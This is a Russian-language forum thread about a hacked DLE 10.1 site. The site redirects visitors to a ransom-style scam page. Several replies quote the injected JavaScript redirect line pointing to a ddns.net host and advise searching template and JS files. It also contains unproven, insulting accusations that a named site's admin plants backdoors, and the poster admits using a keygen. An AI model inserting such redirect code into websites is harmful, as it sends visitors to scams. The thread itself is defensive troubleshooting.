Jump to content

Взломали сайт на дле 10.1


Recommended Posts

Уважаемые форумчане, помогите пожалуйста, У меня взломали сайт. Редиректом перекидывает на какой-то говно домен и где написано, что типа у меня порноматериалы на сайте и я должна оплатить на сот.номер 2000. Звоню на указанный номер - там постоянно недоступно. Понятное дело развод какой-то. Но из-за этого редиректа вообще даже браузер не закрывается, приходится перезагружать ноут. Файлы проверила через файлзиллу, ничего подозрительного не нашла. Посмотрела хтачес, тоже ничего не обнаружила. Подскажите пожалуйста где копать :o

Link to post
Share on other sites
  • Replies 92
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Popular Posts

На сайте было два вируса, один из них никак не связанный с сабжем (даже не знаю что он делал). Всё почистил. На будущее, выкладываю пути где искать если у кого еще такая проблема:  

Я Вам рекомендую здесь даже не раздумывать. Пишите заявление в полицию, указывайте там ссылку на ту страницу, которая в коде указана. В заявлении укажите, что просите привлечь к уголовной ответственно

Скорее всего он там был с самого начала. В 95% паблик сборок DLE и паблик шаблонов спрятаны бэкдоры. Этим делом в основном промышляет админ сайта 8dle.ru - тот еще кулцхакер.

  • Administrators

dinsk.su

У вас в коде страницы, на самом верху встроен скрипт. Вот его и нужно искать (я бы начал с файлов шаблона)

<script>setTimeout( 'location="http://sysprisonlaw.ddns.net/wrn/law.php";', 100 );</script> 
Link to post
Share on other sites
  • Модератор

В самом верху (возможно в шаблоне) у вас прописан код, вызывающий редирект

<script>setTimeout( 'location="http://sysprisonlaw.ddns.net/wrn/law.php";', 100 );</script>

Можете его удалить, но нужно знать: как он туда попал? Искать в логах...

Link to post
Share on other sites

Посмотрите все js файлы на наличие редиректа. Откройте js файлы блокнотом например, и введите в поиске http и далее поиск.

Откройте все шаблоны tpl и таким же способом ищите ссылки.

 

-если ничего не найдете, обновляйтесь.

Link to post
Share on other sites

Напишите свои контакты в лс. Попробую помочь.

спасибо, щас попробую сама, если не получится напишу вам

 

 

 

У вас в коде страницы, на самом верху встроен скрипт. Вот его и нужно искать (я бы начал с файлов шаблона)

<script>setTimeout( 'location="http://sysprisonlaw.ddns.net/wrn/law.php";', 100 );</script> 

поищу в файлах шаблона сейчас

 

В самом верху (возможно в шаблоне) у вас прописан код, вызывающий редирект

<script>setTimeout( 'location="http://sysprisonlaw.ddns.net/wrn/law.php";', 100 );</script>

Можете его удалить, но нужно знать: как он туда попал? Искать в логах...

в логах смотрела, там пусто, может он их почистил

Link to post
Share on other sites

Мда уж!Кое как отвязался от вашей ссылки.

Закажите бэкап у хостера и перезалейте сайт.

Какой бэкап еще? :D  Что бы перезалить с той же вирусной ссылкой?

Link to post
Share on other sites

Не по теме. Всегда считал, что самописанные движки лучше =)

Не правильно считаете товарищ. Самописные движки-это полнейший хлам. Или вы считаете, что какой там программист, написал cms лучше, чем огромная команда DLE, Wordpress и т.д.? :D

Эти самописные движки взламывают - как белка орехи грызет.

Link to post
Share on other sites
  • VIP

В самом верху (возможно в шаблоне) у вас прописан код, вызывающий редирект

<script>setTimeout( 'location="http://sysprisonlaw.ddns.net/wrn/law.php";', 100 );</script>

Можете его удалить, но нужно знать: как он туда попал? Искать в логах...

 

Скорее всего он там был с самого начала. В 95% паблик сборок DLE и паблик шаблонов спрятаны бэкдоры. Этим делом в основном промышляет админ сайта 8dle.ru - тот еще кулцхакер.

Link to post
Share on other sites

Скорее всего он там был с самого начала. В 95% паблик сборок DLE и паблик шаблонов спрятаны бэкдоры. Этим делом в основном промышляет админ сайта 8dle.ru - тот еще кулцхакер.

Именно. Админ сайт DLE http://8dle.ru/ тот еще чмошник. Во все шаблоны ебашит свои редиректы в js файлы.

Link to post
Share on other sites

Не правильно считаете товарищ. Самописные движки-это полнейший хлам. Или вы считаете, что какой там программист, написал cms лучше, чем огромная команда DLE, Wordpress и т.д.? :D

Эти самописные движки взламывают - как белка орехи грызет.

А зачем писать огромную CMS? Можно же просто написать для своего сайта простенький движок с тем функционалом каким надо тебе.

Link to post
Share on other sites
  • Administrators

А зачем писать огромную CMS? Можно же просто написать для своего сайта простенький движок с тем функционалом каким надо тебе.

Можно просто взять тот же Drupal и вообще ничего не писать.

Link to post
Share on other sites

Вопрос к ТС:

У вас Дле официально был куплен? Или была скачана нелегальная копия? Если второй вариант, то не жалуйтесь)))

качала лицензионный дистрибутив. а ключ в кейгене сделала

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.


×
×
  • Create New...